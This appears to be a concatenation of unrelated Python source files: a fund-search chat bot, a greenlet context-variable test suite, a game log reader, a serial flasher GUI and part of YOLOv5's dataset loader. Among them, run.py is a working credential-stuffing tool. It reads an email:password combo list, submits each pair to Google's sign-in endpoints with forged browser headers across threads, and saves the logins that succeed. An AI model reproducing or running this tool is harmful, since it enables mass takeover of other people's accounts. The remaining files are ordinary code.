data_field = 'ISIN (base ccy)'
field_label = 'ISIN codes'
data_rows = self.doSearch(utils.data, rest_of_message, data_field)
if len(data_rows) == 0:
utils.send_message(stream_id, f'No results found for {field_label} matching {rest_of_message}')
elif len(data_rows) == 1:
self.card_processor.send_card(stream_id, data_rows)
else:
self.showMultiOptions(userId, stream_id, data_rows, rest_of_message)
utils.user_log(msg['user'], command, rest_of_message)
# User performs a multiple-choice selection
elif command.isdigit() and userId in utils.user_state.keys():
choice = int(command) - 1
if choice <= len(utils.user_state[userId]):
choice_text = utils.user_state[userId][choice]
data_row = utils.data[utils.data.Funds == choice_text]
self.card_processor.send_card(stream_id, data_row)
del utils.user_state[userId]
else:
utils.send_message(stream_id, 'Invalid choice')
utils.user_log(msg['user'], '/fundname select', choice_text)
# User does anything else
else:
utils.send_message(stream_id, self.other_message)
def doSearch(self, data_rows, rest_of_message, data_field):
search_tokens = set(rest_of_message.lower().split())
# Try contains match
contains_match = utils.data[utils.data[data_field].str.contains(rest_of_message, flags=re.IGNORECASE, na=False)]
# If only 1 hit in contains match or if only 1 word in search query, return this
if len(contains_match) == 1 or len(search_tokens) == 1:
return contains_match
# If more than 1 word in search query, perform tokenised search
for i in data_rows.index:
# Count distinct matching tokens between the search query and data values
value_tokens = set(str(data_rows.loc[i, 'Funds']).lower().split())
match_dict = { k: dict(Counter(value_tokens)).get(k, 0) for k in search_tokens }
sort_weight = sum(match_dict.values())
data_rows.loc[i, 'sort_weight'] = sort_weight
# If no tokens match, return empty result set
max_matches = data_rows['sort_weight'].max()
if (max_matches == 0):
return pd.DataFrame()
# If there is only 1 match with max token matches, return that result
try_exact_match = data_rows[data_rows.sort_weight == max_matches]
if len(try_exact_match) == 1:
return try_exact_match
# Prepare results with at least max - 1 matching tokens
search_threshold = max_matches - 1 if max_matches > 1 else max_matches
data_rows = data_rows[data_rows.sort_weight >= search_threshold]
# Sort by matching tokens in descending then fund name in ascending
return data_rows.sort_values(['sort_weight', 'Funds'], ascending=[False, True])
def showMultiOptions(self, userId, stream_id, data_rows, rest_of_message):
# Extract funds column, slice first 10 results and save
results = list(data_rows['Funds'])[:10]
utils.user_state[userId] = results
# Format results as list items with indexes and send to user
results_str = ''.join([f"<li>{i+1}: {result}</li>" for i, result in enumerate(results)])
utils.send_message(stream_id, f"Please choose one option: <ul>{results_str}</ul>")
|
run.py
|
import requests
import json
import threading
import os
import glob
SUCCESS_LOGIN = 0
FAILED_LOGIN = 0
Threadtimeout = 60
ThreadPoolSize = 3
ValidEmails = []
storeThreads = []
def threadManager(function,Funcargs,Startthreshold,Threadtimeout=5):
if len(storeThreads) != Startthreshold:
storeThreads.append(threading.Thread(target=function,args=tuple(Funcargs) ))
if len(storeThreads) == Startthreshold:
for metaThread in storeThreads:
metaThread.start()
for metaThread in storeThreads:
metaThread.join(Threadtimeout)
del storeThreads[::]
def G_identifier(email,SessionManager):
while 1:
try:
params = (('hl', 'en'),('_reqid', '60794'),('rt', 'j'))
headers = {
'x-same-domain': '1',
'origin': 'https://accounts.google.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9,ar;q=0.8',
'google-accounts-xsrf': '1',
'cookie': 'GAPS=1:5anptsFCcX86o8zx79JaMKbjR6SUSg:i9ZZi85-G8eD7wsC; ',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded;charset=UTF-8',
'accept': '*/*',
'referer': 'https://accounts.google.com/signin/v2/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin',
'authority': 'accounts.google.com',
'dnt': '1'
}
data = [
('continue', 'https://www.youtube.com/signin?hl=en&app=desktop&next=%2F&action_handle_signin=true'),
('service', 'youtube'),
('hl', 'en'),
('f.req', '["{email}","",[],null,"EG",null,null,2,false,true,[null,null,[2,1,null,1,"https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3",null,[],4,[],"GlifWebSignIn"],1,[null,null,[]],null,null,null,true],"{email}"]'.format(email=email)),
('cookiesDisabled', 'false'),
('deviceinfo', '[null,null,null,[],null,"EG",null,null,[],"GlifWebSignIn",null,[null,null,[]]]'),
('gmscoreversion', 'undefined'),
('checkConnection', 'youtube:202:1'),
('checkedDomains', 'youtube'),
('pstMsg', '1')
]
response = SessionManager.post('https://accounts.google.com/_/signin/sl/lookup', headers=headers, params=params, data=data)
return json.loads((response.content).replace(")]}'",""))[0][0][2]
except:
pass
def login(identifier,password,SessionManager):
while(1):
try:
params = (('hl', 'en'),('_reqid', '260794'),('rt', 'j'))
headers = {
'x-same-domain': '1',
'origin': 'https://accounts.google.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9,ar;q=0.8',
'google-accounts-xsrf': '1',
'cookie': 'GAPS=1:Q6gx2sQ34TRRxWUO3mC1_Be79xLYpA:akZ-LyOsSbAsOKOQ',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded;charset=UTF-8',
'accept': '*/*',
'referer': 'https://accounts.google.com/signin/v2/sl/pwd?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&cid=1&navigationDirection=forward',
'authority': 'accounts.google.com',
'dnt': '1',
}
data = [
('continue', 'https://www.youtube.com/signin?hl=en&app=desktop&next=%2F&action_handle_signin=true'),
('service', 'youtube'),
('hl', 'en'),
('f.req', '["{G_identifier}",null,1,null,[1,null,null,null,["{Password}",null,true]],[null,null,[2,1,null,1,"https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3",null,[],4,[],"GlifWebSignIn"],1,[null,null,[]],null,null,null,true]]'.format(G_identifier=identifier,Password=password)),
('cookiesDisabled', 'false'),
('deviceinfo', '[null,null,null,[],null,"EG",null,null,[],"GlifWebSignIn",null,[null,null,[]]]'),
('gmscoreversion', 'undefined'),
('checkConnection', 'youtube:202:1'),
('checkedDomains', 'youtube'),
('pstMsg', '1'),
]
response = SessionManager.post('https://accounts.google.com/_/signin/sl/challenge', headers=headers, params=params, data=data)
login = (response.content).replace(")]}'","")
login = json.loads(login)
try:
if "CheckCookie" in response:
return 1
if str(login[0][0][5][5]) == "INCORRECT_ANSWER_ENTERED":
return 0
except:
return 1
except:
pass
def show_status(action):
os.system("cls")
banner = """
>>> ===================================================== <<<
>>> [DEV] : Koleksibot <<<
>>> [GitHub] : https://www.github.com/koleksibot <<<
>>> [Version] : 1.0v <<<
>>> +++++++++++++++++++++++++++++++++++++++++++++++++++++ <<<
"""
if action == "START":
print banner
else:
s = "[+] Successful Logins = {}\n[!] Failed Logins = {}\n"
print banner
print s.format(SUCCESS_LOGIN,FAILED_LOGIN)
def main(email,password):
global FAILED_LOGIN
global SUCCESS_LOGIN
SessionManager = requests.Session()
identifier = G_identifier(email,SessionManager)
logged = login(identifier,password,SessionManager)
if not logged:
FAILED_LOGIN += 1
else:
SUCCESS_LOGIN += 1
ValidEmails.append(email)
try:
show_status("START")
ThreadPoolSize_custom = raw_input("[*] Choose number of threads [default = {}] [press Enter to use defaults]: ".format(ThreadPoolSize))
if ThreadPoolSize_custom != "":
ThreadPoolSize = int(ThreadPoolSize_custom)
os.chdir(".")
for file in glob.glob("*.txt"):
print(" |_--> " + file)
while (1):
combo_file = raw_input("[*] Setect the name of your [Email:Password] Combo file: ")
try:
read_combo = open(combo_file,"r").read()
break
except:
print "[!] Check your [Email:Password] Combo file name !"
raw_input("[+] All Done! , Press Enter to start .. ")
for data in read_combo.split("\n"):
if data == "":break
email = data.split(":")[0]
password = data.split(":")[1]
threadManager( main, [email,password] , ThreadPoolSize ,Threadtimeout)
show_status("")
write_t = ""
for x in ValidEmails:
write_t += "{}:{}\n".format(x,password)
open('working_emails.txt','a').write(write_t)
del ValidEmails[::]
except Exception as e:
print "[!!!] Fetal Error {}".format(e)
|
test_contextvars.py
|
import unittest
import gc
import sys
from functools import partial
from greenlet import greenlet
from greenlet import getcurrent
try:
from contextvars import Context
from contextvars import ContextVar
from contextvars import copy_context
except ImportError:
Context = ContextVar = copy_context = None
# We don't support testing if greenlet's built-in context var support is disabled.
@unittest.skipUnless(Context is not None, "ContextVar not supported")
class ContextVarsTests(unittest.TestCase):
def _new_ctx_run(self, *args, **kwargs):
return copy_context().run(*args, **kwargs)
def _increment(self, greenlet_id, ctx_var, callback, counts, expect):
if expect is None:
self.assertIsNone(ctx_var.get())
else:
self.assertEqual(ctx_var.get(), expect)
ctx_var.set(greenlet_id)
for _ in range(2):
counts[ctx_var.get()] += 1
callback()
def _test_context(self, propagate_by):
id_var = ContextVar("id", default=None)
id_var.set(0)
callback = getcurrent().switch
counts = dict((i, 0) for i in range(5))
lets = [
greenlet(
partial(
partial(copy_context().run, self._increment)
if propagate_by == "run"
else self._increment,
greenlet_id=i,
ctx_var=id_var,
callback=callback,
counts=counts,
expect=(
i - 1
if propagate_by == "share"
else 0
if propagate_by in ("set", "run")
else None
),
)
)
for i in range(1, 5)
]
for let in lets:
if propagate_by == "set":
let.gr_context = copy_context()
elif propagate_by == "share":
let.gr_context = getcurrent().gr_context
for i in range(2):
counts[id_var.get()] += 1
for let in lets:
let.switch()
if propagate_by == "run":
# Must leave each context.run() in reverse order of entry
for let in reversed(lets):
let.switch()
else:
# No context.run(), so fine to exit in any order.
for let in lets:
let.switch()
for let in lets:
self.assertTrue(let.dead)
# When using run(), we leave the run() as the greenlet dies,
# and there's no context "underneath". When not using run(),
# gr_context still reflects the context the greenlet was
# running in.
self.assertEqual(let.gr_context is None, propagate_by == "run")
if propagate_by == "share":
self.assertEqual(counts, {0: 1, 1: 1, 2: 1, 3: 1, 4: 6})
else:
self.assertEqual(set(counts.values()), set([2]))
def test_context_propagated_by_context_run(self):
self._new_ctx_run(self._test_context, "run")
def test_context_propagated_by_setting_attribute(self):
self._new_ctx_run(self._test_context, "set")
def test_context_not_propagated(self):
self._new_ctx_run(self._test_context, None)
def test_context_shared(self):
self._new_ctx_run(self._test_context, "share")
def test_break_ctxvars(self):
let1 = greenlet(copy_context().run)
let2 = greenlet(copy_context().run)
let1.switch(getcurrent().switch)
let2.switch(getcurrent().switch)
# Since let2 entered the current context and let1 exits its own, the
# interpreter emits:
# RuntimeError: cannot exit context: thread state references a different context object
let1.switch()
def test_not_broken_if_using_attribute_instead_of_context_run(self):
let1 = greenlet(getcurrent().switch)
let2 = greenlet(getcurrent().switch)
let1.gr_context = copy_context()
let2.gr_context = copy_context()
let1.switch()
let2.switch()
let1.switch()
let2.switch()
def test_context_assignment_while_running(self):
id_var = ContextVar("id", default=None)
def target():
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
# Context is created on first use
id_var.set(1)
self.assertIsInstance(gr.gr_context, Context)
self.assertEqual(id_var.get(), 1)
self.assertEqual(gr.gr_context[id_var], 1)
# Clearing the context makes it get re-created as another
# empty context when next used
old_context = gr.gr_context
gr.gr_context = None # assign None while running
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
id_var.set(2)
self.assertIsInstance(gr.gr_context, Context)
self.assertEqual(id_var.get(), 2)
self.assertEqual(gr.gr_context[id_var], 2)
new_context = gr.gr_context
getcurrent().parent.switch((old_context, new_context))
# parent switches us back to old_context
self.assertEqual(id_var.get(), 1)
gr.gr_context = new_context # assign non-None while running
self.assertEqual(id_var.get(), 2)
getcurrent().parent.switch()
# parent switches us back to no context
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
gr.gr_context = old_context
self.assertEqual(id_var.get(), 1)
getcurrent().parent.switch()
# parent switches us back to no context
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
gr = greenlet(target)
with self.assertRaisesRegex(AttributeError, "can't delete attr"):
del gr.gr_context
self.assertIsNone(gr.gr_context)
old_context, new_context = gr.switch()
self.assertIs(new_context, gr.gr_context)
self.assertEqual(old_context[id_var], 1)
self.assertEqual(new_context[id_var], 2)
self.assertEqual(new_context.run(id_var.get), 2)
gr.gr_context = old_context # assign non-None while suspended
gr.switch()
self.assertIs(gr.gr_context, new_context)
gr.gr_context = None # assign None while suspended
gr.switch()
self.assertIs(gr.gr_context, old_context)
gr.gr_context = None
gr.switch()
self.assertIsNone(gr.gr_context)
# Make sure there are no reference leaks
gr = None
gc.collect()
self.assertEqual(sys.getrefcount(old_context), 2)
self.assertEqual(sys.getrefcount(new_context), 2)
def test_context_assignment_different_thread(self):
import threading
ctx = Context()
var = ContextVar("var", default=None)
is_running = threading.Event()
should_suspend = threading.Event()
did_suspend = threading.Event()
should_exit = threading.Event()
holder = []
def greenlet_in_thread_fn():
var.set(1)
is_running.set()
should_suspend.wait()
var.set(2)
getcurrent().parent.switch()
holder.append(var.get())
def thread_fn():
gr = greenlet(greenlet_in_thread_fn)
gr.gr_context = ctx
holder.append(gr)
gr.switch()
did_suspend.set()
should_exit.wait()
gr.switch()
thread = threading.Thread(target=thread_fn, daemon=True)
thread.start()
is_running.wait()
gr = holder[0]
# Can't access or modify context if the greenlet is running
# in a different thread
with self.assertRaisesRegex(ValueError, "running in a different"):
getattr(gr, "gr_context")
with self.assertRaisesRegex(ValueError, "running in a different"):
gr.gr_context = None
should_suspend.set()
did_suspend.wait()
# OK to access and modify context if greenlet is suspended
self.assertIs(gr.gr_context, ctx)
self.assertEqual(gr.gr_context[var], 2)
gr.gr_context = None
should_exit.set()
thread.join()
self.assertEqual(holder, [gr, None])
# Context can still be accessed/modified when greenlet is dead:
self.assertIsNone(gr.gr_context)
gr.gr_context = ctx
self.assertIs(gr.gr_context, ctx)
@unittest.skipIf(Context is not None, "ContextVar supported")
class NoContextVarsTests(unittest.TestCase):
def test_contextvars_errors(self):
let1 = greenlet(getcurrent().switch)
self.assertFalse(hasattr(let1, "gr_context"))
with self.assertRaises(AttributeError):
getattr(let1, "gr_context")
with self.assertRaises(AttributeError):
let1.gr_context = None
let1.switch()
with self.assertRaises(AttributeError):
getattr(let1, "gr_context")
with self.assertRaises(AttributeError):
let1.gr_context = None
|
logpump.py
|
import csv
import functools
import heapq
import logging
import re
import threading
import time
from datetime import datetime
from pathlib import Path
logger = logging.getLogger(__name__)
class Entry(list):
"""ログのエントリを表現するクラス"""
def __init__(self, row: list, category: str, ngs: bool):
super(Entry, self).__init__(row)
if len(self) == 3:
cols = self.pop().split("\t")
self.extend(cols)
self.timestamp = self.str2ts(self[0])
self.sequence = int(self[1])
self.category = category
self.ngs = ngs
def __eq__(self, other):
return self.sequence == other.sequence
def __lt__(self, other):
return self.sequence < other.sequence
def __str__(self):
s = f"{self.category}:" + ",".join(self).replace("\n", r"\n")
if self.ngs:
s = "ngs:" + s
return s
@staticmethod
@functools.lru_cache(maxsize=8)
def str2ts(s):
year = int(s[0:4])
month = int(s[5:7])
day = int(s[8:10])
hour = int(s[11:13])
minute = int(s[14:16])
second = int(s[17:19])
dt = datetime(year, month, day, hour, minute, second)
# dt = datetime.strptime(s, '%Y-%m-%dT%H:%M:%S')
return int(dt.timestamp())
# Meseta,Num等の数値を属性として取得する
def __getattr__(self, name):
rx = re.compile(name + r'\((-?\d+)\)')
for s in filter(lambda x: name in x, self):
res = rx.search(s)
if res:
return int(res.group(1))
return None
def MyDocuments():
import ctypes.wintypes
CSIDL_PERSONAL = 5 # My Documents
SHGFP_TYPE_CURRENT = 0 # Want current, not default value
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(
0, CSIDL_PERSONAL, 0, SHGFP_TYPE_CURRENT, buf)
return Path(buf.value)
class LogFile:
"""
ログファイルから未読部分を読み取る
"""
def __init__(self, path: Path, newfile=False):
self.path = path
self.category = self.cate(self.path.stem)
# self.pos = 2 if newfile else self.path.stat().st_size # 2=BOM
# st_sizeを信用せず、実際に読み進めてposを確定する
self.pos = 2 # 2=BOM
if not newfile:
self.tail()
logger.debug(f'LogFile({self.path.stem}, {newfile}) pos={self.pos}')
@staticmethod
def cate(stem):
return re.match(r'(.+)(Log|_log)', stem).group(1)
class IncompleteLineError(Exception):
def __init__(self):
super().__init__('IncompleteLineError')
def tail(self) -> list:
while True:
try:
return self._tail()
except (UnicodeError, self.IncompleteLineError) as e:
logger.debug(f'{self.path.stem}: {e}')
time.sleep(0.5)
except Exception as e:
logger.debug(f'{self.path.stem}: {e}')
return []
def _tail(self) -> list:
ls = []
with self.path.open(encoding='utf-16-le', newline='') as f:
f.seek(self.pos, 0)
while True:
line = f.readline()
if not line:
self.pos = f.tell()
return ls
if not line.endswith('\n'):
raise self.IncompleteLineError
ls.append(line)
while line.count('"') % 2 == 1:
trail = f.readline()
if not trail or not trail.endswith('\n'):
raise self.IncompleteLineError
ls.append(trail)
line += trail
def seqregurator(callback):
"""callbackのsequence順を保障するwrapper"""
def flush(heap, expect):
drop = []
while heap:
entry = heapq.heappop(heap)
callback(entry)
drop += list(range(expect, entry.sequence))
expect = entry.sequence + 1
if drop:
drop = ','.join(map(str, drop))
logger.warning(f'Drop {drop}')
return expect
def main():
heap = []
expect = None
while True:
entry = yield
if expect is None or entry.sequence < expect:
if expect is not None:
logger.info(f'sequense restart ({entry.sequence})')
flush(heap, expect)
expect = entry.sequence
heapq.heappush(heap, entry)
while heap and heap[0].sequence == expect:
entry = heapq.heappop(heap)
callback(entry)
expect += 1
if heap:
pend = ','.join(map(str, sorted([x.sequence for x in heap])))
logger.debug(f"expect:{expect} pend:{pend}")
ts = [x.timestamp for x in heap]
if (max(ts) - min(ts)) > 3:
expect = flush(heap, expect)
coro = main()
next(coro)
return coro.send
class LogFolder:
def __init__(self, path: Path, callback):
logger.debug(f'LogFolder({str(path)})')
self.path = path
self.callback = seqregurator(callback)
self.logfiles = {
path: LogFile(path)
for path in self.logs()
}
self.ngs = "ngs" in path.stem
self.known = set(self.logfiles.keys())
def logs(self):
logs = list(filter(
lambda path: path.stem != "pso2dynamicdownloader_log",
self.path.glob("*Log*.txt")))
def newestof(cate):
logs_cate = filter(lambda x: x.stem.startswith(cate), logs)
return max(logs_cate)
categories = {LogFile.cate(x.stem) for x in logs}
return {newestof(cate) for cate in categories}
def scan(self):
now = self.logs()
for path in (now - self.known):
self.logfiles[path] = LogFile(path, True)
self.known.add(path)
for log in self.logfiles.values():
for row in csv.reader(log.tail(), dialect=csv.excel_tab):
entry = Entry(row, log.category, self.ngs)
self.callback(entry)
for path in (self.known - now):
del self.logfiles[path]
self.known.discard(path)
logger.debug('removed ' + str(path))
class LogPump:
def __init__(self, callback):
sega = MyDocuments().joinpath("SEGA")
self.folderz = {
path: LogFolder(path, callback)
for path in map(
lambda subpath: sega.joinpath(subpath), [
'PHANTASYSTARONLINE2/log',
'PHANTASYSTARONLINE2/log_ngs',
])
if path.is_dir()
}
self.th = threading.Thread(target=self._main, daemon=True)
def _main(self):
while self.keep_running:
for folder in self.folderz.values():
folder.scan()
time.sleep(0.5)
def start(self):
self.keep_running = True
self.th.start()
def stop(self):
self.keep_running = False
self.th.join()
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG,
format='%(levelname)s : %(asctime)s : %(message)s')
pump = LogPump(print)
pump.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
pump.stop()
|
MrBurner.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQtEngine import Ui_MainWindow
from SerialManager import SerialManager
from ConsoleManager import ConsoleManager
from FileManager import FileManager
from BurnerManager import BurnerManager
from time import sleep as delay
from Utils import Utils
import threading
import sys
class MrBurner():
def __init__(self):
self.ports = []
self.MainWindow = None
self.ui = None
def startApp(self):
self.app = QtWidgets.QApplication(sys.argv)
self.MainWindow = QtWidgets.QMainWindow()
self.ui = Ui_MainWindow()
self.ui.setupUi(self.MainWindow)
app_icon = QtGui.QIcon()
app_icon.addFile('Logo.jpg', QtCore.QSize(256,256))
self.MainWindow.setWindowIcon(app_icon)
self.MainWindow.show()
self.translate = self.ui.translate
self.portSelector = self.ui.portSelector
self.baudSelector = self.ui.baudSelector
self.hexBox = self.ui.hexBox
self.console = self.ui.console_thread
#Buttons
self.connectButton = self.ui.connectButton
self.flashButton = self.ui.flashButton
self.eraseButton = self.ui.eraseButton
self.sendButton = self.ui.sendButton
#acciotns
self.openFile = self.ui.actionOpen
# Init Managers
delay(1)
self.consoleManager = ConsoleManager(self.console)
self.serialManager = SerialManager(self.consoleManager, self.ui, self.app)
self.fileManager = FileManager(self.hexBox, self.ui)
self.burnerManager = BurnerManager(self.serialManager, self.fileManager, self.ui.progressBar, self.consoleManager)
self.startSignals()
self.startThreads()
def startThread(self, function):
threading.Thread(target=function, daemon=True).start()
def startSignals(self):
self.consoleManager.pub('Starting Signals\n')
self.portSelector.currentIndexChanged.connect(self.serialManager.change_port)
self.connectButton.clicked.connect(self.serialManager.connect)
self.eraseButton.clicked.connect(self.serialManager.change_port)
self.flashButton.clicked.connect(self.burnerManager.burn)
self.sendButton.clicked.connect(self.serialManager.send_write)
self.openFile.triggered.connect(self.fileManager.open_file)
def startThreads(self):
self.startThread(self.serialManager.port_events)
# self.startThread(self.serialManager.port_selector_observer)
# self.startThread(self.serialManager.read_port)
# self.startThread(self.burnerManager.burn_task)
if __name__ == "__main__":
app = MrBurner()
app.startApp()
sys.exit(app.app.exec_())
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
